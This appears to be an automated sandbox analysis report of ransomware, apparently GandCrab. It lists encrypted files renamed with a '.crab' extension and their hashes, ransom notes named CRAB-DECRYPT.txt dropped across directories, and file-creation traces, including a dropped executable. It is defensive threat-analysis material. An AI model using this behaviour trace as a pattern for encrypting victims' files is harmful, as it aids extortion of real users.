SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\2052\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\2070\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\3076\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\3082\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\client\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\extended\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\588bce7c90097ed212\graphics\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\$getcurrent\logs\downlevel_2017_09_07_02_02_39_766.log.crab 42.20 KB MD5: bad8e21f809a72fb580cbc79e424970c
SHA1: 2b367b94f8310e44fcfc2d456744c9ba5433d53e
SHA256: 6e13581e49d679f41d95bcea62a0146cac376e9a1c248ecb9632913cc8f18d45
False
c:\$getcurrent\logs\oobe_2017_09_07_03_08_57_737.log.crab 6.38 KB MD5: 2813c6ca7dc3a40a8bf7bab20b3cf54a
SHA1: 0b767acf023cd9f81b1fbbf7128e5beca950a6d0
SHA256: 207492f4fc8a69f59c9b52a31275ac2cf069633516f1df39db68ed99fb286430
False
c:\$getcurrent\logs\partnersetupcompleteresult.log.crab 0.55 KB MD5: 4b6a466e94b2579803cbb6c86353039f
SHA1: c13230b6188a2b52ac2161d3c48f009c759f70be
SHA256: 65cec1c93592ce22cb28ba4bb16268a761f5c4b437b6d4057f721717d728badc
False
c:\$getcurrent\safeos\getcurrentrollback.ini.crab 0.66 KB MD5: 4876fb0d382bda368434e62cc92f2568
SHA1: 482ca1081f016b930e1839f7cd58727ba500ab06
SHA256: c9f2e8ec64f1616fad670eccddbc834a4ebcf82f23c1247a08e296f8dbfb668b
False
c:\588bce7c90097ed212\1025\eula.rtf.crab 7.90 KB MD5: e0ee79085d0f792a63fed4ac62a03590
SHA1: 591d081035954005a5eed9fc69a3606d4e5173a9
SHA256: 3652374d5f3b3a5beccea4bf7600c7ec7b9f8481aec705ce559b68480ba71130
False
c:\588bce7c90097ed212\1025\localizeddata.xml.crab 72.99 KB MD5: efb9f8d05f6e00784e596d6b764a0983
SHA1: 72c2fac851a3dda86ca7e92d80e3d884276d87ca
SHA256: 0b63892ee62a36c5c881a091f2b2e269ef334331a48e2077645db4e9d8812e01
False
c:\588bce7c90097ed212\1028\eula.rtf.crab 6.68 KB MD5: fc78f7df948670f32794282c5dd53492
SHA1: 95cf20ddf4f496b454383cbe8ebd640cfa3c8e27
SHA256: 3c4375dcbb02d2be6d17f252afef01e14c3f9096b1cda0af5025291f55ab3281
False
c:\588bce7c90097ed212\1028\localizeddata.xml.crab 59.90 KB MD5: 9085235dfd32d6a25994037cb5be029b
SHA1: 376d5857c977d2f199ce6210c7cd4cdca80a4bf0
SHA256: 1576dfc0006b99e8ea81dfd4562fc757c2c64be5c23ec08dd45cd4123c6b7963
False
c:\588bce7c90097ed212\1029\eula.rtf.crab 4.15 KB MD5: 98f1878d9375fe5cc208ebeef8b49b6f
SHA1: 62b4e51a0d4ed13e9ab4c69f62c302aedbc28fa1
SHA256: 698dd01cc8f9048f33414514ff6fcc9719e184cfe7684487e03754cca85a66a0
False
c:\588bce7c90097ed212\1029\localizeddata.xml.crab 79.59 KB MD5: c65ae7342465df4e8edfc0204f7c4257
SHA1: dfc15473b8a225523bc49180fdbc661161e47a32
SHA256: fd701f74b03cdcf32898c5f8b9c55846dfd4230454c32c63bd2f368e83cffad3
False
c:\588bce7c90097ed212\1030\eula.rtf.crab 3.76 KB MD5: 98664501c0d12ddea631ac9b4da6bc81
SHA1: eb05b24645fff243d275be80cf5900aaa09ccbcd
SHA256: ddac908a72047342ca6a2c976ce78f988644bfe722f9626b4daaf39b8a7e8a20
False
c:\588bce7c90097ed212\1030\localizeddata.xml.crab 76.45 KB MD5: 477e1684a91737ea995cc2e3308aed1b
SHA1: b62d31d6ad2bd18f5df8ae967c7edaffb96da700
SHA256: d7fe6e7726d258605b23be9245c9962eede8cd883a3634468027df90c8ae92bd
False
c:\588bce7c90097ed212\1031\eula.rtf.crab 3.85 KB MD5: b444708a822f1cc53b2eb13731716a2a
SHA1: 498a293a092447be9a91706641e29bb39cbe33d1
SHA256: 008114a1d791e17b08e368193fb4e3978ba87e5a4971d8c103bef3c5a25cf3b9
False
c:\588bce7c90097ed212\1031\localizeddata.xml.crab 80.93 KB MD5: 68707c343a0f51c469bcbf20a74df565
SHA1: b296016070469d0bf7aed2f953a029825996efc7
SHA256: c13c94eb18ebb0d8d9c583c5102a9d051cd965cf5aaea3511df7da045c750afe
False
c:\588bce7c90097ed212\1032\eula.rtf.crab 9.18 KB MD5: 7cdd119628054dd683f1edb6ea80f1b3
SHA1: 930cc685d3f1e99bb732558dadde865f79d6e95e
SHA256: 5dfac09314a8eff8032ee84c5eb81cf0997971c23d3cc8f0acb9c9e71ffa2ed0
False
c:\588bce7c90097ed212\1032\localizeddata.xml.crab 84.77 KB MD5: 016470d9b73d4212e30e451c63e4be1d
SHA1: 79b3b9481c405325a4fc851a4b392a9f9c5c55ab
SHA256: 0e3eabcef7fb2f9ac410ecb27a2df677faa480a11a4746435019747e7823df2d
False
c:\588bce7c90097ed212\1033\eula.rtf.crab 3.63 KB MD5: e9eb45a97c023a3ef15ba90310d8d33d
SHA1: bf0d06291154e0c5c12bcc206b495a2ac2dea4fd
SHA256: eafb9d7b4f64bee82ed9562c55408b055a654518c25f454f382b603dd596d384
False
c:\588bce7c90097ed212\1033\localizeddata.xml.crab 75.93 KB MD5: bfbbede50207ac1eca8a01505d5e4986
SHA1: 4ce2e7e15b9c3c0c64e8ac35b5246907e5eb0a09
SHA256: 21b8e4bb4c35206da918f7037a2f83d8cd14f40fd919ff2b004a8c52f87946c3
False
c:\588bce7c90097ed212\1035\eula.rtf.crab 4.13 KB MD5: 8c1af5712382a26f6924a93e7fc0d93a
SHA1: 19474f278f697341b89c8484da814e57c09bc6f9
SHA256: d52d131d2308250a4011de30e9c7dcce6a0c9a3082f74a8720848af1bde7b049
False
c:\588bce7c90097ed212\1035\localizeddata.xml.crab 75.73 KB MD5: d5646a5282a4fc8fa720454ce8b6b31d
SHA1: 3f46718f37f639dfa4444967315dceebb9abad25
SHA256: e4d149f582920a2fb62c1c0279eecb576ff9caeec03a26b44da3d1224888a46c
False
c:\588bce7c90097ed212\1036\eula.rtf.crab 3.96 KB MD5: 5ea1a58d18f16fb325b632c4ce9b9d6f
SHA1: 2becb1dd5c8e484c155b906e8f9cc8bbee9c6218
SHA256: 0a5528285fbb7288b148c9d8ec7f0d4a18e071ca3e620850c8cc65f1b92cdb25
False
c:\588bce7c90097ed212\1036\localizeddata.xml.crab 81.54 KB MD5: 4452fc9174e0868f7158a2f3660eba47
SHA1: 0c03b628d61a8a93b46328778088d34941d56ed5
SHA256: 95430a918ebe9077ab7d07637389827454d35b8dc4cfa48ca48b1d50599c502f
False
c:\588bce7c90097ed212\1037\eula.rtf.crab 7.21 KB MD5: d6c61d37e0e5743f149fdcf6373757e4
SHA1: 8d3b69cfe0e1da293556115efb63f90c482fe57c
SHA256: 26824e4737911cdcc7355dd687f8ee8f1a3597008429b49ce0e5e9532fc8c22c
False
c:\588bce7c90097ed212\1037\localizeddata.xml.crab 70.90 KB MD5: 356816dc245c05fb6d0fa8bb16835056
SHA1: b0959780b24c56ff01e4ffe0a09e10c564ca4f1f
SHA256: 35a23767965ac72e51d67e83654b0bb8298cf7b63b689f0b8e5c233b1ce90c40
False
c:\588bce7c90097ed212\1038\eula.rtf.crab 4.66 KB MD5: 569ae5801e7e21b25f4965ca3f187ecb
SHA1: 87a9a8ea59174ed178d59c20ab8f864f5db75172
SHA256: 691851910a379e82291c9106e35a1816c6dd766217b045284f4e32bccc5d953f
False
c:\588bce7c90097ed212\1038\localizeddata.xml.crab 84.93 KB MD5: faa7851f59fb98cd416aeb464e0f3ec2
SHA1: 2a97849653ce4aa23b6ade43fdb5249f05b7cb30
SHA256: 453b5c1ae6ae970c4ed69755fd6e69e0bdc5ee3bb916bf2c57a0a1cb4c5f1c2d
False
c:\588bce7c90097ed212\1040\eula.rtf.crab 4.07 KB MD5: 729d6d05389a3ed5617b0afa04ea3cba
SHA1: b49f9f2ca39df496fb85cd4a8ee4fa667e81f592
SHA256: 3f984d7c582d62c711c88937a383f5f0bf67236b5695457895c246a88328398c
False
c:\588bce7c90097ed212\1040\localizeddata.xml.crab 78.70 KB MD5: 6c65cff8091aff35ead8528dafdaef7d
SHA1: 8b78afec0d89fc4c3ac8bbe72da26dd3da73ee8d
SHA256: 92520bfa7b6e3ed69c9b48cb3fa46e4f63fc10b6f312c48c0f77e93ffc5e1d6f
False
c:\588bce7c90097ed212\1041\eula.rtf.crab 10.40 KB MD5: 28cf1c81807c4677c5c377a1b0bc8ec6
SHA1: 12ae75c1394116460c8e97fcbf19179e114dd64f
SHA256: 11461d22c200894b1af107e08d56eaa78691e1fbb216998487599d132db0cb85
False
c:\588bce7c90097ed212\1041\localizeddata.xml.crab 67.15 KB MD5: 5287bfd58f2a16c301934543e4e32d08
SHA1: b02364656c5d4c9b7619ce1a3f5d748c48b25089
SHA256: e1ebeffe33e95513a2dd2ee1196a40c5a3070f6e966d7853f40b7f1b0fd94c30
False
c:\588bce7c90097ed212\1042\eula.rtf.crab 12.90 KB MD5: e8c6d5e9e045decec52c72388adb28b0
SHA1: ad1657f811e3cff1d67f8cf08a891f82f407d130
SHA256: 116b9e619a524e73696b5139a852c84c9933a9e17559b33b8cecd382b84f0758
False
c:\588bce7c90097ed212\1042\localizeddata.xml.crab 64.23 KB MD5: 8d7be19eceaec02c483eda072859366c
SHA1: 9d046079f352dcb09eb48c78de308cb7c4894b9f
SHA256: d120d44be6a45b49656a5b1970956af5ab929307060079bd74091d7761135958
False
c:\588bce7c90097ed212\1043\eula.rtf.crab 3.98 KB MD5: e30ff3c47a215c6f6108387119904c6c
SHA1: 125f512a901516932d9d3325fbc0095a6358d710
SHA256: db407a33e5140bb393531978a20653f5242c0212dc9f1e269815821131366f10
False
c:\588bce7c90097ed212\1043\localizeddata.xml.crab 78.29 KB MD5: 760a90ed6f4db84353c3b26f833edd4b
SHA1: 463d214af24ddabc2ad255bcd2911db14a5729c1
SHA256: 5d13e0337dad60f2e90627e38cb2bd78ef1f50321a0424c989860a25de98faef
False
c:\588bce7c90097ed212\1044\eula.rtf.crab 3.49 KB MD5: 8512bddec63e9c514664c2de4fac0389
SHA1: a66715923a9f2490270d8ea3e9fcc29faca1a36d
SHA256: 0151986bb0dccbe56cdf0cda2bc699046204641dfd7c9d57b457d1165364fcce
False
c:\588bce7c90097ed212\1044\localizeddata.xml.crab 77.95 KB MD5: e48730c27d18446724bddfd306c7d745
SHA1: 9527abe38f82fc0527cf50325899d2851577197c
SHA256: a9d22cdb8f1fd3b2bb7e23a9877f85e6c1c57235a8963321b7f37f2b891d936e
False
c:\588bce7c90097ed212\1045\eula.rtf.crab 4.46 KB MD5: ce7c9662ae09686f611caf106b9a5e18
SHA1: 002b118bceceda6e5583dd2249f1509f78f20a55
SHA256: 7817a5c14e5b01652121ef48dd4b1772ac89b633dd668157c5aad2aaae3e36c3
False
c:\588bce7c90097ed212\1045\localizeddata.xml.crab 80.96 KB MD5: d11a7fe535ce6274869bb78b47e65432
SHA1: 6d4027940be35b1ee0b4c5889403fc3cc32f924e
SHA256: be13dfd99484bca26941b19c0ade6e3ae26900fb055b4e0776ea494a9a355a8e
False
c:\588bce7c90097ed212\1046\eula.rtf.crab 4.12 KB MD5: eb64d6eb06fabfe52dffb31036aad101
SHA1: 76ea72559b7bf97aa3d863dd9fb57ad99a833858
SHA256: 87246ca7dd34803080a9b80e19c451f69faa9c1e4c274943accd4571bd3adfcb
False
c:\588bce7c90097ed212\1046\localizeddata.xml.crab 79.37 KB MD5: 9471cce90841ce6340e8bf6f2ed2e0e2
SHA1: ce65e9f57d3312c82d35f9a860dedbfc7fd4327f
SHA256: e6683994daadcb8db37d464bac14d88888149c197a925f3ed215d74e9b0d17f7
False
c:\588bce7c90097ed212\1049\eula.rtf.crab 53.70 KB MD5: 57c1554fe65f86a69da09783b5456fe7
SHA1: f7496e9397811faf4994b87f2eb515e121911e10
SHA256: bea333df7ff17319e507edb399bf8526312a0cf3d69afdd33faab72858a4565a
False
c:\588bce7c90097ed212\1049\localizeddata.xml.crab 80.09 KB MD5: 8b4962fb49fb7f6203daeb2997868430
SHA1: db7fa3834ccb32d7292b78f12ca9ad5cf46d2a94
SHA256: c036f8fe64299c6a3ec624eda477af35732bfdfd0910aa05f790f53f3b49424f
False
c:\588bce7c90097ed212\1053\eula.rtf.crab 4.29 KB MD5: 3c969f4d3444229cb03ee2b022ae463c
SHA1: c9e2a8df4d26ee342fd8ebec84661176a41517b1
SHA256: a812cda6d5dc72c6e9af27b5e95825571c6a0efc9da651e953cfea55a098344b
False
c:\588bce7c90097ed212\1053\localizeddata.xml.crab 76.37 KB MD5: 4ec04e453d762f8a3eb5594bd31e3a87
SHA1: a42d0faccc1d087d0de73ce9c4649c5aa757daf1
SHA256: cb582ae31f1e9f00f175e732505c0a93efd641add1756345171dacfc94e2b9d3
False
c:\588bce7c90097ed212\1055\eula.rtf.crab 4.29 KB MD5: c76e175ba33e729b13792c5cf914f62d
SHA1: fbc00c507944df90b4d2b2bb9e2e15fe76d2151b
SHA256: fc2ec148c09e2d1e709ecfea5d7ac61d5d13a237c4aaeff89693d8afa8f2659d
False
c:\588bce7c90097ed212\1055\localizeddata.xml.crab 75.54 KB MD5: f23ea0286e44d91b492c3c370f3e4cb5
SHA1: 2bd5a91042d20c78beb6972ff8154d2905c2e8ef
SHA256: 31ab10a1db306e8da17d2ddebb2c8b5379ce034f2a02007b5ee2e09dc41a7e2c
False
c:\588bce7c90097ed212\2052\eula.rtf.crab 6.21 KB MD5: 6a123b212eafa13f8552ffdaed8c6987
SHA1: b43775fa91c4483ba72a1a4fc683a6f0abc3e9a0
SHA256: c973116e8d2526d4bc30196fbea37b395b016ad5d9f29cc5d77924902ba59acc
False
c:\588bce7c90097ed212\2052\localizeddata.xml.crab 59.77 KB MD5: 2f61fb43a9d00bebc56e25288276b896
SHA1: 68ba024aa51985edf8deddd22844538b3c7e5d71
SHA256: 981f7739bfac08c606477dd7595f951948868b857bf8499615e18a0c887d9a0c
False
c:\588bce7c90097ed212\2070\eula.rtf.crab 4.43 KB MD5: fd893188e9e3dbd1a78672c68913d4c1
SHA1: fe7fdbf2e7ab7b9c32eefb87f74d778d36c9d4c5
SHA256: 10dc246116521567dd8cb8b0feb5f467cc8bb4a88ce6f3634857e242e9538f51
False
c:\588bce7c90097ed212\2070\localizeddata.xml.crab 78.88 KB MD5: ace38479fd1ba914091d5291c06aacf5
SHA1: 4fdb4406b9f15142261e6196e6a781cf696c0a91
SHA256: aa98fc92cd9f8061a22b015bf38718ab0639c95c9c266cc7e9fd0f6bee5661ad
False
c:\588bce7c90097ed212\3076\eula.rtf.crab 6.68 KB MD5: 6050e37c19a07b12fb4f118f53dcd897
SHA1: c22677863e99ef1c5150c50e075abaa84ae96f97
SHA256: 16eb7be44721812de04b621f290b36a7566c8473a103087527b08a65d356522c
False
c:\588bce7c90097ed212\3076\localizeddata.xml.crab 59.90 KB MD5: 622db4d718031bd62e50d131d5af1a55
SHA1: cb0755d4d0caaa48f7b8859bb5f23b5163abc334
SHA256: 79ff36ea6d1e4f36427225bfc85e32648a6e740dd9113627c9a9a9c62799a120
False
c:\588bce7c90097ed212\3082\eula.rtf.crab 3.51 KB MD5: 1b359b0ac5ad71f624d8732bac4e52f4
SHA1: 11b1cfab74c219e3012fa35657a040a9e397ed19
SHA256: 8863da9d173726ec62a0fed0a6fc69631a0edfaed44cb530f125bb6e567beaf2
False
c:\588bce7c90097ed212\3082\localizeddata.xml.crab 78.63 KB MD5: 87352ef4fd7b198a9171e50378cc55d2
SHA1: a19e47598cbfa02998b9f7e2cc8afc9f7a2e2b8c
SHA256: 192fe6e62a16cd0c7b8c0ec7f5c65dc21b340237147b0f31a952767e28d3c6bb
False
c:\588bce7c90097ed212\client\parameterinfo.xml.crab 197.59 KB MD5: 4f7174ee650eab169a17d8481c607c29
SHA1: 7a97a9749fbc335956d002d3b55c0b3a01e5a7fb
SHA256: 3c9c912d68b0596ddfe4598acb6b69c0c6ae06c2fd57652749762f9ae1a22860
False
c:\588bce7c90097ed212\client\uiinfo.xml.crab 38.65 KB MD5: 7ba892317a596bed3bf0fd7fe6a5db13
SHA1: 37acdf0e50ec42f28f0a2fa4db30fdab65644551
SHA256: 9729db6544b5e433314cf0314af0ffd99912c953c19b932ca32f7d74ce271843
False
c:\588bce7c90097ed212\dhtmlheader.html.crab 16.26 KB MD5: 236ec177c2349523c0646c19dda083aa
SHA1: 2ceae09e886b4e51db2d34ddc13e4331a723ad52
SHA256: 6d2dc47da113cd885de9af29019667e2f4b5891905310d8c4711f2e5011910c7
False
c:\588bce7c90097ed212\extended\parameterinfo.xml.crab 91.65 KB MD5: 1075df4e6fd9ced8375ba1eebc8f96a2
SHA1: 416795e50a0cc7fb080a17bbad68c08589eb6830
SHA256: 0dc8bd03de85e4072ddda330e83d006fbd73b3c59132b86db6523ae5c80b9e20
False
c:\588bce7c90097ed212\extended\uiinfo.xml.crab 38.65 KB MD5: b583b6cb380e7aa4634659c7f69ce108
SHA1: 07a8bcf84e642a258fda6a5af2fad2c14e04e55b
SHA256: b965e67ac794cbc3e99affdaa1c02ba19908e41a38c17cdfbe66fec1b4d72bc9
False
c:\588bce7c90097ed212\header.bmp.crab 4.05 KB MD5: 966b9ae783b4912c46c2c2ab2396af40
SHA1: 8e83969075860dce14aebc40e4937b8e93d09e62
SHA256: 0b792db2303c87d654261c30454872d1848138878149b57977ae4908c62858c4
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\fd1hvy\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1051304884-625712362-2192934891-1000\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71 0.05 KB MD5: 0d7db7ff842f89a36b58fa2541de2a6c
SHA1: 50f3b486f99fb22648d26870e7a5cba01caed3da
SHA256: 140eda45fe001c0fe47edd7fc509ff1882d46fbcb7c7437d893c1fb83012e433
False
Host Behavior
File (646)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\$GetCurrent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\$GetCurrent\Logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\$GetCurrent\Logs\downlevel_2017_09_07_02_02_39_766.log.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\$GetCurrent\Logs\oobe_2017_09_07_03_08_57_737.log.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\$GetCurrent\Logs\PartnerSetupCompleteResult.log.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\$GetCurrent\SafeOS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\$GetCurrent\SafeOS\GetCurrentRollback.ini.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\$Recycle.Bin\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1025\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1025\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1025\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1028\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1028\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1028\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1029\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1029\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1029\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1030\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1030\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1030\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1031\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1031\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1031\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1032\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1032\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1032\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1033\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1033\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1035\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1035\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1035\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1036\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1036\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1036\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1037\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1037\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1037\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1038\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1038\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1038\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1040\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\588bce7c90097ed212\1040\eula.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1040\LocalizedData.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\1041\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
